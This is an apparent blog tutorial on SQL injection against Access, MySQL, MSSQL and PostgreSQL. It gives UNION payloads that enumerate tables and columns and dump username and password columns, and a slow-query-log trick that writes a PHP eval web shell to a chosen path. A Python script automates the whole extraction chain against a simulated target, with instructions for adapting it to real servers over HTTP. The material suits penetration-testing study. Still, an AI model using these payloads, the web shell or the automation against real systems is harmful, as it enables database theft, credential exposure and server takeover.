Access, MySQL, MSSQL and PostgreSQL: getting familiar with injection in four basic databases

0x00 Database Introduction

Access: there is no highest-privilege user and there are no system tables, so injection is usually done by brute-force guessing table and column names. Access databases are standalone: one database file normally corresponds to one website, whereas a single MySQL server usually hosts the databases of several websites. Access injection can also use offset injection.
MySQL, MSSQL, PostgreSQL: these three each have a highest-privilege user (root, sa and postgres respectively) and system tables. MySQL behaves differently before and after version 5.0: from 5.0 on it provides the information_schema system database, so table and column names can be queried instead of guessed.

0x01 Basic statements for MySQL, MSSQL and PostgreSQL

MySQL reads a file: load_file() (returns NULL when the FILE privilege is missing or the path is outside secure_file_priv)

union select 1,load_file('d:/1.txt'),3,4,5

MySQL writes content to a file: into outfile

union select 1,'shell',3,4,5 into outfile 'd:/1.txt'

Both operations need the FILE privilege and are restricted by secure_file_priv (see the previous article on breaking through write restrictions). secure_file_priv is read-only at runtime and cannot be changed with SET GLOBAL, so the workaround below writes through the slow query log instead. That needs the ability to run arbitrary statements (stacked queries through the SQL command line, phpMyAdmin, etc.), not just a single injected SELECT. Note that a statement only lands in the slow log when it runs longer than long_query_time (10 seconds by default), so either lower long_query_time or sleep longer than that value.

set global slow_query_log=1;
set global slow_query_log_file='<shell path>';
select '<?php eval($_GET[A])?>' or SLEEP(1);

MSSQL injection
- measure the number of columns:

order by 4
and 1=2 union all select null,null,null,null

- measure the position (which columns are echoed back):

and 1=2 union all select null,1,null,null
and 1=2 union all select null,null,'s',null

- get information:

@@version: version information
db_name(): current database name
user, system_user, current_user, user_name(): current user name
@@SERVERNAME: server host name

and 1=2 union all select null,db_name(),null,null
- get table names (each further name is obtained by adding the names already found to the not in (...) list until the subquery returns null):

and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

- get column names (col_name(object_id('manage'), n) returns the nth column of manage; increase n until it returns null):

and 1=2  union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
and 1=2  union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
and 1=2  union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
and 1=2  union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

- retrieve data:

and 1=2 union all select null,username, password ,null from manage

PostgreSQL statements
- measure the number of columns:

order by 4
and 1=2 union select null,null,null,null

- measure the position: a string literal is only accepted in the 2nd and 3rd columns, so those are the ones to use for extraction

and 1=2 union select 'null',null,null,null    error
and 1=2 union select null,'null',null,null    normal
and 1=2 union select null,null,'null',null    normal
and 1=2 union select null,null,null,'null'    error

- get information:

and 1=2 UNION SELECT null,version(),null,null
and 1=2 UNION SELECT null,current_user,null,null
and 1=2 union select null,current_database(),null,null

- get database names (string_agg joins all of them into one value):

and 1=2 union select null,string_agg(datname,','),null,null from pg_database

- get table names (two equivalent ways):

1. and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
2. and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

- get column names:

and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

- retrieve data:

and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

- supplement: find superuser accounts (as a superuser it is also possible to read and write files):

and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE

MSSQL and PostgreSQL usually use null as the placeholder for columns being probed, because they type-check the columns of a UNION strictly; MySQL is lenient and can use numbers.
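The MSSQL and PostgreSQL procedures above are the same loop every time: count the columns, find the positions that are echoed back, then pull the catalog through a working slot. The script below is an added example, not code from the original post, that automates that loop against a constructed target: an in-memory SQLite database behind a simulated vulnerable page, chosen because it runs offline. SQLite's catalog names (sqlite_master, pragma_table_info, group_concat, limit 1) stand in for sysobjects/col_name/top 1 on MSSQL and pg_tables/information_schema.columns/string_agg on PostgreSQL; the marker string, table names and sample rows are all constructed for the example.

```python
import re
import sqlite3

# Added example, not from the original post. SQLite stands in for the
# MSSQL/PostgreSQL backends; only the catalog expressions differ per dialect.


def make_target():
    """Constructed sample data: an admin table worth dumping and the news
    table that the vulnerable page actually queries."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE manage (id INTEGER, username TEXT, password TEXT, created TEXT);
        INSERT INTO manage VALUES (1, 'admin', 'P@ssw0rd', '2020-01-01');
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, created TEXT);
        INSERT INTO news VALUES (1, 'hello', 'world', '2020-01-02');
    """)
    return conn


def make_page(conn):
    """Stand-in for the vulnerable page: it concatenates the id parameter
    straight into the query and renders only the title and body columns.
    A database error becomes (False, ""), like an HTTP error page."""
    def page(param):
        sql = "SELECT id, title, body, created FROM news WHERE id = " + param
        try:
            rows = conn.execute(sql).fetchall()
        except sqlite3.Error:
            return False, ""
        return True, "\n".join("<li>%s - %s</li>" % (r[1], r[2]) for r in rows)
    return page


def union_payload(ncols, pos, expr):
    """Build `1 and 1=2 union all select null,...,<expr>,...,null`."""
    cols = ["null"] * ncols
    cols[pos] = expr
    return "1 and 1=2 union all select " + ",".join(cols)


def find_column_count(page, max_cols=32):
    """`order by n` errors once n exceeds the column count; the all-null
    UNION of that width confirms it."""
    for n in range(1, max_cols + 1):
        ok, _ = page("1 order by %d" % n)
        if not ok:
            ncols = n - 1
            ok, _ = page(union_payload(ncols, 0, "null"))
            return ncols if ok else None
    return None


def find_reflected_positions(page, ncols, marker="zqx7"):
    """Put a string marker in one slot at a time; slots whose marker is echoed
    are usable. MSSQL/PostgreSQL error on a string in an integer slot instead,
    which is why the post probes with null plus one literal per position."""
    return [i for i in range(ncols)
            if (lambda ok, body: ok and marker in body)(
                *page(union_payload(ncols, i, "'%s'" % marker)))]


def extract(page, ncols, pos, expr):
    """Inject a scalar subquery wrapped in <<...>> so its value can be cut out
    of the HTML; returns None when the subquery yields NULL."""
    ok, body = page(union_payload(ncols, pos, "'<<'||(%s)||'>>'" % expr))
    m = re.search(r"<<(.*?)>>", body, re.S) if ok else None
    return m.group(1) if m else None


def enumerate_tables(page, ncols, pos):
    """The post's `top 1 ... name not in (...)` loop: every name found so far
    joins the exclusion list until the subquery returns NULL."""
    found = []
    while True:
        excl = ",".join("'%s'" % t for t in found) or "''"
        name = extract(page, ncols, pos,
                       "select name from sqlite_master where type='table' "
                       "and name not in (%s) limit 1" % excl)
        if name is None:
            return found
        found.append(name)


def column_names(page, ncols, pos, table):
    """SQLite equivalent of string_agg(column_name, ',') over information_schema.columns."""
    return extract(page, ncols, pos,
                   "select group_concat(name, ',') from pragma_table_info('%s')" % table)


def dump_table(page, ncols, pos, table, col_a, col_b):
    """Aggregate two columns into one value, like string_agg(name, ',') in the post."""
    return extract(page, ncols, pos,
                   "select group_concat(%s||':'||%s, ',') from %s" % (col_a, col_b, table))


def run_demo():
    page = make_page(make_target())
    ncols = find_column_count(page)
    positions = find_reflected_positions(page, ncols)
    pos = positions[0]
    return {"column_count": ncols, "positions": positions,
            "tables": enumerate_tables(page, ncols, pos),
            "manage_columns": column_names(page, ncols, pos, "manage"),
            "manage_rows": dump_table(page, ncols, pos, "manage", "username", "password")}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run it directly to print the recovered column count, reflected positions, table list, column list and dumped credentials. Against a real MSSQL or PostgreSQL target, replace page() with an HTTP request whose status and body fill the (ok, body) pair, swap the three catalog expressions for the dialect-specific ones given above, and remember that those engines reject a string literal in an integer UNION slot, so the position probe should treat an error, not a missing marker, as "wrong type".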

Origin blog.csdn.net/qq_53577336/article/details/127468153